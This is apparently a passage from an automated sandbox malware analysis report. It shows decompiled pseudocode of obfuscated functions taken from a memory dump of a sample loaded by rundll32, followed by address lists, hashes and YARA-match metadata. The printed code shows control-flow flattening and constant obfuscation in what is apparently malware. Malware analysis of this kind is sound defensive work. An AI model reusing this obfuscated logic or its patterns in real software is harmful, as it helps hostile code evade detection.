                                                                                                                                    										if(_t253 != 0xea70970) {
                                                                                                                                    											goto L14;
                                                                                                                                    										} else {
                                                                                                                                    											_t250 = _v644;
                                                                                                                                    											_t234 = _v628;
                                                                                                                                    											_t226 = E002DDA22(_v628, _t250, _t268, _v636,  &_v524, _v628, _v652);
                                                                                                                                    											_t260 = _t260 + 0x10;
                                                                                                                                    											if(_t226 != 0) {
                                                                                                                                    												_t253 = 0x9c0fe90;
                                                                                                                                    												continue;
                                                                                                                                    											}
                                                                                                                                    										}
                                                                                                                                    									}
                                                                                                                                    								}
                                                                                                                                    							}
                                                                                                                                    						}
                                                                                                                                    						L20:
                                                                                                                                    						return _t227;
                                                                                                                                    					}
                                                                                                                                    					E002DC1EC(_v600, _v592,  &_v572);
                                                                                                                                    					_pop(_t234);
                                                                                                                                    					_t253 = 0xdba0984;
                                                                                                                                    					L14:
                                                                                                                                    					__eflags = _t253 - 0x15a60c5;
                                                                                                                                    				} while (__eflags != 0);
                                                                                                                                    				goto L20;
                                                                                                                                    			}











































                                                                                                                                    0x002d4378
                                                                                                                                    0x002d4380
                                                                                                                                    0x002d4388
                                                                                                                                    0x002d4390
                                                                                                                                    0x002d4398
                                                                                                                                    0x002d43a0
                                                                                                                                    0x002d43a8
                                                                                                                                    0x002d43b0
                                                                                                                                    0x002d43b8
                                                                                                                                    0x002d43c0
                                                                                                                                    0x002d43cc
                                                                                                                                    0x002d43cf
                                                                                                                                    0x002d43d3
                                                                                                                                    0x002d43d7
                                                                                                                                    0x002d43df
                                                                                                                                    0x002d43df
                                                                                                                                    0x002d43f1
                                                                                                                                    0x002d44da
                                                                                                                                    0x00000000
                                                                                                                                    0x002d43f7
                                                                                                                                    0x002d43f9
                                                                                                                                    0x002d44b8
                                                                                                                                    0x002d44c1
                                                                                                                                    0x002d44c6
                                                                                                                                    0x002d44c8
                                                                                                                                    0x002d44cb
                                                                                                                                    0x002d44ce
                                                                                                                                    0x002d44d0
                                                                                                                                    0x00000000
                                                                                                                                    0x002d44d0
                                                                                                                                    0x002d43ff
                                                                                                                                    0x002d4405
                                                                                                                                    0x002d445e
                                                                                                                                    0x002d446a
                                                                                                                                    0x002d447b
                                                                                                                                    0x002d447f
                                                                                                                                    0x002d4485
                                                                                                                                    0x002d4489
                                                                                                                                    0x002d448e
                                                                                                                                    0x00000000
                                                                                                                                    0x002d4407
                                                                                                                                    0x002d440d
                                                                                                                                    0x002d450a
                                                                                                                                    0x002d4513
                                                                                                                                    0x002d451e
                                                                                                                                    0x002d4525
                                                                                                                                    0x002d4527
                                                                                                                                    0x002d4529
                                                                                                                                    0x002d452f
                                                                                                                                    0x002d4531
                                                                                                                                    0x002d4531
                                                                                                                                    0x002d452b
                                                                                                                                    0x002d452b
                                                                                                                                    0x002d452d
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002d452d
                                                                                                                                    0x002d4529
                                                                                                                                    0x002d4413
                                                                                                                                    0x002d4413
                                                                                                                                    0x002d4419
                                                                                                                                    0x00000000
                                                                                                                                    0x002d441f
                                                                                                                                    0x002d4430
                                                                                                                                    0x002d4434
                                                                                                                                    0x002d4438
                                                                                                                                    0x002d443d
                                                                                                                                    0x002d4442
                                                                                                                                    0x002d4448
                                                                                                                                    0x00000000
                                                                                                                                    0x002d4448
                                                                                                                                    0x002d4442
                                                                                                                                    0x002d4419
                                                                                                                                    0x002d440d
                                                                                                                                    0x002d4405
                                                                                                                                    0x002d43f9
                                                                                                                                    0x002d4535
                                                                                                                                    0x002d453e
                                                                                                                                    0x002d453e
                                                                                                                                    0x002d44f1
                                                                                                                                    0x002d44f6
                                                                                                                                    0x002d44f7
                                                                                                                                    0x002d44fc
                                                                                                                                    0x002d44fc
                                                                                                                                    0x002d44fc
                                                                                                                                    0x00000000

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: ,a$`2$?
                                                                                                                                    • API String ID: 0-2087061617
                                                                                                                                    • Opcode ID: b784a720297949f87423ab3e41f7841c8e45ec588285f05096a8cbe103c55e24
                                                                                                                                    • Instruction ID: 2127ababe095194d40387de314877b82c2f0881b7c165bde18d997db64056898
                                                                                                                                    • Opcode Fuzzy Hash: b784a720297949f87423ab3e41f7841c8e45ec588285f05096a8cbe103c55e24
                                                                                                                                    • Instruction Fuzzy Hash: B5A130724183819FC368DF65C98A40BFBF1BBC4708F408A1DF5DA96260D3B58A598F46
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                    			E002C59F2() {
                                                                                                                                    				char _v520;
                                                                                                                                    				char _v1040;
                                                                                                                                    				intOrPtr _v1044;
                                                                                                                                    				intOrPtr _v1048;
                                                                                                                                    				intOrPtr _v1052;
                                                                                                                                    				intOrPtr _v1056;
                                                                                                                                    				signed int _v1060;
                                                                                                                                    				signed int _v1064;
                                                                                                                                    				signed int _v1068;
                                                                                                                                    				signed int _v1072;
                                                                                                                                    				signed int _v1076;
                                                                                                                                    				signed int _v1080;
                                                                                                                                    				signed int _v1084;
                                                                                                                                    				signed int _v1088;
                                                                                                                                    				signed int _v1092;
                                                                                                                                    				signed int _v1096;
                                                                                                                                    				signed int _v1100;
                                                                                                                                    				signed int _v1104;
                                                                                                                                    				signed int _v1108;
                                                                                                                                    				signed int _v1112;
                                                                                                                                    				signed int _v1116;
                                                                                                                                    				signed int _v1120;
                                                                                                                                    				signed int _v1124;
                                                                                                                                    				signed int _v1128;
                                                                                                                                    				signed int _v1132;
                                                                                                                                    				signed int _v1136;
                                                                                                                                    				signed int _v1140;
                                                                                                                                    				void* _t202;
                                                                                                                                    				void* _t208;
                                                                                                                                    				intOrPtr _t209;
                                                                                                                                    				void* _t214;
                                                                                                                                    				void* _t222;
                                                                                                                                    				intOrPtr _t237;
                                                                                                                                    				intOrPtr _t240;
                                                                                                                                    				signed int _t241;
                                                                                                                                    				signed int _t242;
                                                                                                                                    				signed int _t243;
                                                                                                                                    				signed int _t244;
                                                                                                                                    				signed int* _t247;
                                                                                                                                    
                                                                                                                                    				_t247 =  &_v1140;
                                                                                                                                    				_v1056 = 0x36f622;
                                                                                                                                    				_v1052 = 0x8ed67e;
                                                                                                                                    				_t214 = 0xf737bb2;
                                                                                                                                    				_v1048 = 0x93fb3c;
                                                                                                                                    				_t240 = 0;
                                                                                                                                    				_v1044 = 0;
                                                                                                                                    				_v1076 = 0x48eb17;
                                                                                                                                    				_v1076 = _v1076 + 0x189d;
                                                                                                                                    				_v1076 = _v1076 ^ 0x00442401;
                                                                                                                                    				_v1100 = 0xa45863;
                                                                                                                                    				_v1100 = _v1100 << 2;
                                                                                                                                    				_t241 = 0x1d;
                                                                                                                                    				_v1100 = _v1100 * 0x7c;
                                                                                                                                    				_v1100 = _v1100 ^ 0x3e6538f4;
                                                                                                                                    				_v1108 = 0x56f1ad;
                                                                                                                                    				_v1108 = _v1108 | 0xbff0a597;
                                                                                                                                    				_v1108 = _v1108 / _t241;
                                                                                                                                    				_v1108 = _v1108 ^ 0x06946226;
                                                                                                                                    				_v1132 = 0xc3fd0a;
                                                                                                                                    				_v1132 = _v1132 << 8;
                                                                                                                                    				_v1132 = _v1132 + 0xffff9bc2;
                                                                                                                                    				_t242 = 0x18;
                                                                                                                                    				_v1132 = _v1132 / _t242;
                                                                                                                                    				_v1132 = _v1132 ^ 0x0821d39f;
                                                                                                                                    				_v1068 = 0xc66dea;
                                                                                                                                    				_v1068 = _v1068 + 0xffff0514;
                                                                                                                                    				_v1068 = _v1068 ^ 0x00c0919e;
                                                                                                                                    				_v1136 = 0x72811d;
                                                                                                                                    				_v1136 = _v1136 ^ 0x5ea2c622;
                                                                                                                                    				_t243 = 0x5d;
                                                                                                                                    				_v1136 = _v1136 * 0x4f;
                                                                                                                                    				_v1136 = _v1136 * 0x41;
                                                                                                                                    				_v1136 = _v1136 ^ 0xd3c4c324;
                                                                                                                                    				_v1096 = 0x2e25e6;
                                                                                                                                    				_v1096 = _v1096 ^ 0xbdbebaf9;
                                                                                                                                    				_v1096 = _v1096 ^ 0xbd932287;
                                                                                                                                    				_v1060 = 0x3d42d8;
                                                                                                                                    				_v1060 = _v1060 << 6;
                                                                                                                                    				_v1060 = _v1060 ^ 0x0f5887f2;
                                                                                                                                    				_v1116 = 0xec9c1f;
                                                                                                                                    				_v1116 = _v1116 >> 1;
                                                                                                                                    				_v1116 = _v1116 + 0xcef9;
                                                                                                                                    				_v1116 = _v1116 ^ 0x0078140d;
                                                                                                                                    				_v1084 = 0xf6a299;
                                                                                                                                    				_v1084 = _v1084 >> 9;
                                                                                                                                    				_v1084 = _v1084 ^ 0x00023821;
                                                                                                                                    				_v1124 = 0xf6e97d;
                                                                                                                                    				_v1124 = _v1124 + 0xffff8c4c;
                                                                                                                                    				_v1124 = _v1124 / _t243;
                                                                                                                                    				_v1124 = _v1124 | 0xda1c672f;
                                                                                                                                    				_v1124 = _v1124 ^ 0xda1e012d;
                                                                                                                                    				_v1120 = 0x9bdb66;
                                                                                                                                    				_v1120 = _v1120 * 0x47;
                                                                                                                                    				_v1120 = _v1120 + 0xdb13;
                                                                                                                                    				_v1120 = _v1120 * 0x64;
                                                                                                                                    				_v1120 = _v1120 ^ 0xe2e3c71f;
                                                                                                                                    				_v1112 = 0x9fec0e;
                                                                                                                                    				_v1112 = _v1112 << 0xc;
                                                                                                                                    				_v1112 = _v1112 | 0xd7512eb2;
                                                                                                                                    				_v1112 = _v1112 ^ 0xffdc645c;
                                                                                                                                    				_v1104 = 0xc74eee;
                                                                                                                                    				_v1104 = _v1104 + 0x930c;
                                                                                                                                    				_v1104 = _v1104 ^ 0x28280d38;
                                                                                                                                    				_v1104 = _v1104 ^ 0x28ef0d26;
                                                                                                                                    				_v1064 = 0xc36095;
                                                                                                                                    				_v1064 = _v1064 | 0x2d8f7273;
                                                                                                                                    				_v1064 = _v1064 ^ 0x2dcb1501;
                                                                                                                                    				_v1140 = 0xa3c477;
                                                                                                                                    				_v1140 = _v1140 ^ 0xb16da3ec;
                                                                                                                                    				_v1140 = _v1140 ^ 0x8917fdcb;
                                                                                                                                    				_v1140 = _v1140 >> 0xe;
                                                                                                                                    				_v1140 = _v1140 ^ 0x000e0fa0;
                                                                                                                                    				_v1128 = 0x58136;
                                                                                                                                    				_v1128 = _v1128 << 6;
                                                                                                                                    				_v1128 = _v1128 << 0x10;
                                                                                                                                    				_v1128 = _v1128 + 0xffffe729;
                                                                                                                                    				_v1128 = _v1128 ^ 0x4d79f308;
                                                                                                                                    				_v1072 = 0x735c84;
                                                                                                                                    				_t244 = 0x7f;
                                                                                                                                    				_v1072 = _v1072 / _t244;
                                                                                                                                    				_v1072 = _v1072 ^ 0x0002b970;
                                                                                                                                    				_v1080 = 0x91f75b;
                                                                                                                                    				_v1080 = _v1080 + 0xffffc39e;
                                                                                                                                    				_v1080 = _v1080 ^ 0x009f463e;
                                                                                                                                    				_v1088 = 0xdf4dcf;
                                                                                                                                    				_v1088 = _v1088 | 0x05792173;
                                                                                                                                    				_v1088 = _v1088 ^ 0x05f69aec;
                                                                                                                                    				_v1092 = 0xf44447;
                                                                                                                                    				_v1092 = _v1092 * 0x78;
                                                                                                                                    				_v1092 = _v1092 ^ 0x728504a1;
                                                                                                                                    				do {
                                                                                                                                    					while(_t214 != 0x89b0ee) {
                                                                                                                                    						if(_t214 == 0x291094f) {
                                                                                                                                    							E002C3C3C(_v1072, _v1080,  &_v1040, _v1088, _v1092);
                                                                                                                                    						} else {
                                                                                                                                    							if(_t214 == 0x6a25a64) {
                                                                                                                                    								E002DDA22(_v1076, _v1100, __eflags, _v1108,  &_v520, _t214, _v1132);
                                                                                                                                    								_t247 =  &(_t247[4]);
                                                                                                                                    								_t214 = 0xe0c4196;
                                                                                                                                    								continue;
                                                                                                                                    							} else {
                                                                                                                                    								if(_t214 == 0xe0c4196) {
                                                                                                                                    									_push(_v1096);
                                                                                                                                    									_push(_v1136);
                                                                                                                                    									_t208 = E002DDCF7(_v1068, 0x2c1000, __eflags);
                                                                                                                                    									_pop(_t222);
                                                                                                                                    									_t209 =  *0x2e3e10; // 0x0
                                                                                                                                    									_t237 =  *0x2e3e10; // 0x0
                                                                                                                                    									E002C47CE(_t237 + 0x23c, _v1060, _t222, _v1116, _v1084, _t208, _t209 + 0x1c, _v1124, _v1120);
                                                                                                                                    									E002CA8B0(_v1112, _t208, _v1104);
                                                                                                                                    									_t247 =  &(_t247[9]);
                                                                                                                                    									_t214 = 0x89b0ee;
                                                                                                                                    									continue;
                                                                                                                                    								} else {
                                                                                                                                    									if(_t214 != 0xf737bb2) {
                                                                                                                                    										goto L10;
                                                                                                                                    									} else {
                                                                                                                                    										_t214 = 0x6a25a64;
                                                                                                                                    										continue;
                                                                                                                                    									}
                                                                                                                                    								}
                                                                                                                                    							}
                                                                                                                                    						}
                                                                                                                                    						L13:
                                                                                                                                    						return _t240;
                                                                                                                                    					}
                                                                                                                                    					_push(_v1128);
                                                                                                                                    					_push( &_v1040);
                                                                                                                                    					_push(_v1140);
                                                                                                                                    					_t202 = E002E13AD(_v1064,  &_v520, __eflags);
                                                                                                                                    					_t247 =  &(_t247[3]);
                                                                                                                                    					__eflags = _t202;
                                                                                                                                    					_t240 =  !=  ? 1 : _t240;
                                                                                                                                    					_t214 = 0x291094f;
                                                                                                                                    					L10:
                                                                                                                                    					__eflags = _t214 - 0xb653a05;
                                                                                                                                    				} while (__eflags != 0);
                                                                                                                                    				goto L13;
                                                                                                                                    			}










































                                                                                                                                    0x00000000

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: &($&($%.
                                                                                                                                    • API String ID: 0-466442461
                                                                                                                                    • Opcode ID: 9acc0af54c4d476e0866cba7db8b8204ba5d0b399564822fe14f5af64e44b9c1
                                                                                                                                    • Instruction ID: 897dc9c8dddedacef5d35ddc56b35d432eda9f3503fbf44cad597134d4720521
                                                                                                                                    • Opcode Fuzzy Hash: 9acc0af54c4d476e0866cba7db8b8204ba5d0b399564822fe14f5af64e44b9c1
                                                                                                                                    • Instruction Fuzzy Hash: 25A13FB01183819FC798CF26C58981BFBE1FBC4348F008A1DF5A696220D7B5CA59CF86
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 83%
                                                                                                                                    			E002E13AD(void* __ecx, void* __edx, void* __eflags) {
                                                                                                                                    				void* _t197;
                                                                                                                                    				signed int _t222;
                                                                                                                                    				signed int _t226;
                                                                                                                                    				void* _t236;
                                                                                                                                    				void* _t245;
                                                                                                                                    				void* _t246;
                                                                                                                                    
                                                                                                                                    				_t245 = _t246 - 0x6c;
                                                                                                                                    				_push( *((intOrPtr*)(_t245 + 0x7c)));
                                                                                                                                    				_push( *((intOrPtr*)(_t245 + 0x78)));
                                                                                                                                    				_push( *((intOrPtr*)(_t245 + 0x74)));
                                                                                                                                    				_push(__edx);
                                                                                                                                    				_push(__ecx);
                                                                                                                                    				E002D20B9(_t197);
                                                                                                                                    				 *(_t245 + 0x10) =  *(_t245 + 0x10) & 0x00000000;
                                                                                                                                    				 *(_t245 + 0x14) =  *(_t245 + 0x14) & 0x00000000;
                                                                                                                                    				 *((intOrPtr*)(_t245 + 8)) = 0x9cee1d;
                                                                                                                                    				 *((intOrPtr*)(_t245 + 0xc)) = 0x3f83c9;
                                                                                                                                    				 *(_t245 + 0x38) = 0xf8747;
                                                                                                                                    				 *(_t245 + 0x38) =  *(_t245 + 0x38) | 0x414cebc6;
                                                                                                                                    				 *(_t245 + 0x38) =  *(_t245 + 0x38) << 1;
                                                                                                                                    				 *(_t245 + 0x38) =  *(_t245 + 0x38) ^ 0x829fdf8f;
                                                                                                                                    				 *(_t245 + 0x4c) = 0x1e90b9;
                                                                                                                                    				 *(_t245 + 0x4c) =  *(_t245 + 0x4c) * 0x5b;
                                                                                                                                    				 *(_t245 + 0x4c) =  *(_t245 + 0x4c) * 0x75;
                                                                                                                                    				 *(_t245 + 0x4c) =  *(_t245 + 0x4c) * 0x4c;
                                                                                                                                    				 *(_t245 + 0x4c) =  *(_t245 + 0x4c) ^ 0x63bb7720;
                                                                                                                                    				 *(_t245 + 0x54) = 0x94d35;
                                                                                                                                    				 *(_t245 + 0x54) =  *(_t245 + 0x54) | 0xafff8ff7;
                                                                                                                                    				 *(_t245 + 0x54) =  *(_t245 + 0x54) ^ 0xafffc7f7;
                                                                                                                                    				 *(_t245 + 0x40) = 0x2ce8ae;
                                                                                                                                    				 *(_t245 + 0x40) =  *(_t245 + 0x40) << 0xe;
                                                                                                                                    				 *(_t245 + 0x40) =  *(_t245 + 0x40) << 2;
                                                                                                                                    				 *(_t245 + 0x40) =  *(_t245 + 0x40) ^ 0xe8aa4789;
                                                                                                                                    				 *(_t245 + 0x58) = 0x43e6f3;
                                                                                                                                    				 *(_t245 + 0x58) =  *(_t245 + 0x58) + 0xffff66dc;
                                                                                                                                    				 *(_t245 + 0x58) =  *(_t245 + 0x58) + 0xffff2d2d;
                                                                                                                                    				 *(_t245 + 0x58) =  *(_t245 + 0x58) << 3;
                                                                                                                                    				 *(_t245 + 0x58) =  *(_t245 + 0x58) ^ 0x021485d0;
                                                                                                                                    				 *(_t245 + 0x24) = 0x72d00d;
                                                                                                                                    				 *(_t245 + 0x24) =  *(_t245 + 0x24) + 0xff2c;
                                                                                                                                    				 *(_t245 + 0x24) =  *(_t245 + 0x24) ^ 0x0076519a;
                                                                                                                                    				 *(_t245 + 0x34) = 0x43d743;
                                                                                                                                    				 *(_t245 + 0x34) =  *(_t245 + 0x34) + 0xffff7104;
                                                                                                                                    				 *(_t245 + 0x34) =  *(_t245 + 0x34) + 0xffff9485;
                                                                                                                                    				 *(_t245 + 0x34) =  *(_t245 + 0x34) ^ 0x004ddf56;
                                                                                                                                    				 *(_t245 + 0x2c) = 0xa6821;
                                                                                                                                    				 *(_t245 + 0x2c) =  *(_t245 + 0x2c) + 0xffff1b8c;
                                                                                                                                    				 *(_t245 + 0x2c) =  *(_t245 + 0x2c) ^ 0x00054b1d;
                                                                                                                                    				 *(_t245 + 0x60) = 0x210575;
                                                                                                                                    				 *(_t245 + 0x60) =  *(_t245 + 0x60) + 0xffff47c1;
                                                                                                                                    				 *(_t245 + 0x60) =  *(_t245 + 0x60) << 0xd;
                                                                                                                                    				 *(_t245 + 0x60) =  *(_t245 + 0x60) | 0x53e227ba;
                                                                                                                                    				 *(_t245 + 0x60) =  *(_t245 + 0x60) ^ 0x5bea66b9;
                                                                                                                                    				 *(_t245 + 0x44) = 0xde4c18;
                                                                                                                                    				 *(_t245 + 0x44) =  *(_t245 + 0x44) ^ 0x2ab2982c;
                                                                                                                                    				 *(_t245 + 0x44) =  *(_t245 + 0x44) | 0x439a512a;
                                                                                                                                    				 *(_t245 + 0x44) =  *(_t245 + 0x44) ^ 0x6bf18420;
                                                                                                                                    				 *(_t245 + 0x50) = 0xde2575;
                                                                                                                                    				 *(_t245 + 0x50) =  *(_t245 + 0x50) >> 0xa;
                                                                                                                                    				 *(_t245 + 0x50) =  *(_t245 + 0x50) << 0xe;
                                                                                                                                    				 *(_t245 + 0x50) =  *(_t245 + 0x50) ^ 0xce6820f5;
                                                                                                                                    				 *(_t245 + 0x50) =  *(_t245 + 0x50) ^ 0xc3874735;
                                                                                                                                    				 *(_t245 + 0x18) = 0x52bd7f;
                                                                                                                                    				 *(_t245 + 0x18) =  *(_t245 + 0x18) ^ 0x005e950b;
                                                                                                                                    				 *(_t245 + 0x3c) = 0xe72c64;
                                                                                                                                    				 *(_t245 + 0x3c) =  *(_t245 + 0x3c) * 0x71;
                                                                                                                                    				 *(_t245 + 0x3c) =  *(_t245 + 0x3c) | 0xa2bf1516;
                                                                                                                                    				 *(_t245 + 0x3c) =  *(_t245 + 0x3c) ^ 0xe6bf08bc;
                                                                                                                                    				 *(_t245 + 0x48) = 0x12926a;
                                                                                                                                    				 *(_t245 + 0x48) =  *(_t245 + 0x48) | 0xd69b5974;
                                                                                                                                    				 *(_t245 + 0x48) =  *(_t245 + 0x48) << 0xc;
                                                                                                                                    				 *(_t245 + 0x48) =  *(_t245 + 0x48) ^ 0xbdb2bc40;
                                                                                                                                    				 *(_t245 + 0x5c) = 0xf2f3b3;
                                                                                                                                    				 *(_t245 + 0x5c) =  *(_t245 + 0x5c) << 3;
                                                                                                                                    				 *(_t245 + 0x5c) =  *(_t245 + 0x5c) + 0xffff4add;
                                                                                                                                    				 *(_t245 + 0x5c) =  *(_t245 + 0x5c) + 0x5b51;
                                                                                                                                    				 *(_t245 + 0x5c) =  *(_t245 + 0x5c) ^ 0x0796f200;
                                                                                                                                    				 *(_t245 + 0x64) = 0x250dfe;
                                                                                                                                    				 *(_t245 + 0x64) =  *(_t245 + 0x64) << 7;
                                                                                                                                    				 *(_t245 + 0x64) =  *(_t245 + 0x64) | 0xde1ed6e5;
                                                                                                                                    				 *(_t245 + 0x64) =  *(_t245 + 0x64) ^ 0xc3c6abe4;
                                                                                                                                    				 *(_t245 + 0x64) =  *(_t245 + 0x64) ^ 0x1d594f44;
                                                                                                                                    				 *(_t245 + 0x68) = 0x1b0053;
                                                                                                                                    				_t226 = 0x44;
                                                                                                                                    				 *(_t245 + 0x68) =  *(_t245 + 0x68) * 0x1d;
                                                                                                                                    				 *(_t245 + 0x68) =  *(_t245 + 0x68) >> 0xa;
                                                                                                                                    				 *(_t245 + 0x68) =  *(_t245 + 0x68) ^ 0xa237b60d;
                                                                                                                                    				 *(_t245 + 0x68) =  *(_t245 + 0x68) ^ 0xa23e8db7;
                                                                                                                                    				 *(_t245 + 0x30) = 0x848c63;
                                                                                                                                    				_t142 = _t245 - 0x18; // 0x12da7d1b
                                                                                                                                    				 *(_t245 + 0x30) =  *(_t245 + 0x30) / _t226;
                                                                                                                                    				 *(_t245 + 0x30) =  *(_t245 + 0x30) ^ 0x3584b77a;
                                                                                                                                    				 *(_t245 + 0x30) =  *(_t245 + 0x30) ^ 0x35842ad7;
                                                                                                                                    				 *(_t245 + 0x28) = 0x69c662;
                                                                                                                                    				 *(_t245 + 0x28) =  *(_t245 + 0x28) * 0x1f;
                                                                                                                                    				 *(_t245 + 0x28) =  *(_t245 + 0x28) ^ 0x0ccd1c29;
                                                                                                                                    				 *(_t245 + 0x20) = 0x70b48b;
                                                                                                                                    				 *(_t245 + 0x20) =  *(_t245 + 0x20) ^ 0xdd83dbf0;
                                                                                                                                    				 *(_t245 + 0x20) =  *(_t245 + 0x20) ^ 0xddf73f48;
                                                                                                                                    				 *(_t245 + 0x1c) = 0x80403c;
                                                                                                                                    				 *(_t245 + 0x1c) =  *(_t245 + 0x1c) * 0x1c;
                                                                                                                                    				 *(_t245 + 0x1c) =  *(_t245 + 0x1c) ^ 0x0e0dbad6;
                                                                                                                                    				_push( *(_t245 + 0x58));
                                                                                                                                    				_push( *(_t245 + 0x40));
                                                                                                                                    				_t236 = 0x1e;
                                                                                                                                    				E002C4B61(_t142, _t236);
                                                                                                                                    				_t166 = _t245 - 0x220; // 0x12da7b13
                                                                                                                                    				E002C4B61(_t166, 0x208,  *(_t245 + 0x24),  *(_t245 + 0x34));
                                                                                                                                    				_t169 = _t245 - 0x428; // 0x12da790b
                                                                                                                                    				E002C4B61(_t169, 0x208,  *(_t245 + 0x2c),  *(_t245 + 0x60));
                                                                                                                                    				_t171 = _t245 - 0x220; // 0x12da7b13
                                                                                                                                    				E002C3BC0( *(_t245 + 0x44),  *(_t245 + 0x50), __edx,  *(_t245 + 0x18),  *(_t245 + 0x3c), _t171);
                                                                                                                                    				_t176 = _t245 - 0x428; // 0x12da790b
                                                                                                                                    				E002C3BC0( *(_t245 + 0x48),  *(_t245 + 0x5c),  *((intOrPtr*)(_t245 + 0x78)),  *(_t245 + 0x64),  *(_t245 + 0x68), _t176);
                                                                                                                                    				_t183 = _t245 - 0x18; // 0x12da7d1b
                                                                                                                                    				 *(_t245 - 0x14) =  *(_t245 + 0x38);
                                                                                                                                    				_t185 = _t245 - 0x220; // 0x12da7b13
                                                                                                                                    				 *((intOrPtr*)(_t245 - 0x10)) = _t185;
                                                                                                                                    				_t187 = _t245 - 0x428; // 0x12da790b
                                                                                                                                    				 *((intOrPtr*)(_t245 - 0xc)) = _t187;
                                                                                                                                    				 *((short*)(_t245 - 8)) =  *(_t245 + 0x54) |  *(_t245 + 0x4c) | 0x00000410;
                                                                                                                                    				_t222 = E002C4DDD( *(_t245 + 0x30), _t183,  *(_t245 + 0x28),  *(_t245 + 0x20),  *(_t245 + 0x1c));
                                                                                                                                    				asm("sbb eax, eax");
                                                                                                                                    				return  ~_t222 + 1;
                                                                                                                                    			}









                                                                                                                                    0x002e14ad
                                                                                                                                    0x002e14b4
                                                                                                                                    0x002e14bb
                                                                                                                                    0x002e14bf
                                                                                                                                    0x002e14c6
                                                                                                                                    0x002e14cd
                                                                                                                                    0x002e14d4
                                                                                                                                    0x002e14db
                                                                                                                                    0x002e14e2
                                                                                                                                    0x002e14e9
                                                                                                                                    0x002e14f0
                                                                                                                                    0x002e14f4
                                                                                                                                    0x002e14f8
                                                                                                                                    0x002e14ff
                                                                                                                                    0x002e1506
                                                                                                                                    0x002e1513
                                                                                                                                    0x002e151a
                                                                                                                                    0x002e1525
                                                                                                                                    0x002e1528
                                                                                                                                    0x002e152f
                                                                                                                                    0x002e1536
                                                                                                                                    0x002e153d
                                                                                                                                    0x002e1544
                                                                                                                                    0x002e1548
                                                                                                                                    0x002e154f
                                                                                                                                    0x002e1556
                                                                                                                                    0x002e155a
                                                                                                                                    0x002e1561
                                                                                                                                    0x002e1568
                                                                                                                                    0x002e156f
                                                                                                                                    0x002e1576
                                                                                                                                    0x002e157a
                                                                                                                                    0x002e1581
                                                                                                                                    0x002e158a
                                                                                                                                    0x002e1591
                                                                                                                                    0x002e159e
                                                                                                                                    0x002e159f
                                                                                                                                    0x002e15a2
                                                                                                                                    0x002e15a6
                                                                                                                                    0x002e15ad
                                                                                                                                    0x002e15b4
                                                                                                                                    0x002e15c0
                                                                                                                                    0x002e15c3
                                                                                                                                    0x002e15c6
                                                                                                                                    0x002e15cd
                                                                                                                                    0x002e15d4
                                                                                                                                    0x002e15df
                                                                                                                                    0x002e15e2
                                                                                                                                    0x002e15e9
                                                                                                                                    0x002e15f0
                                                                                                                                    0x002e15f7
                                                                                                                                    0x002e15fe
                                                                                                                                    0x002e1609
                                                                                                                                    0x002e160c
                                                                                                                                    0x002e1613
                                                                                                                                    0x002e1616
                                                                                                                                    0x002e161b
                                                                                                                                    0x002e161c
                                                                                                                                    0x002e1629
                                                                                                                                    0x002e1632
                                                                                                                                    0x002e163f
                                                                                                                                    0x002e1648
                                                                                                                                    0x002e164d
                                                                                                                                    0x002e1661
                                                                                                                                    0x002e1666
                                                                                                                                    0x002e167c
                                                                                                                                    0x002e1684
                                                                                                                                    0x002e1687
                                                                                                                                    0x002e168d
                                                                                                                                    0x002e1693
                                                                                                                                    0x002e1696
                                                                                                                                    0x002e169c
                                                                                                                                    0x002e16b0
                                                                                                                                    0x002e16ba
                                                                                                                                    0x002e16c4
                                                                                                                                    0x002e16cc

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: !h$5M$d,
                                                                                                                                    • API String ID: 0-3324333736
                                                                                                                                    • Opcode ID: 31a7f9833dcd0b326e9f299eef76f1a004f3f3853abdcdc5a6d1f5c948d3c773
                                                                                                                                    • Instruction ID: fc6b538aecd8e6de5c9208c9711b14628841a23698ff0e787e28a158b3703fe7
                                                                                                                                    • Opcode Fuzzy Hash: 31a7f9833dcd0b326e9f299eef76f1a004f3f3853abdcdc5a6d1f5c948d3c773
                                                                                                                                    • Instruction Fuzzy Hash: DD91CEB141038C9BCF58DF65C98A9DE3FB1BB04358F509219FD2A96260D3B5C999CF84
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

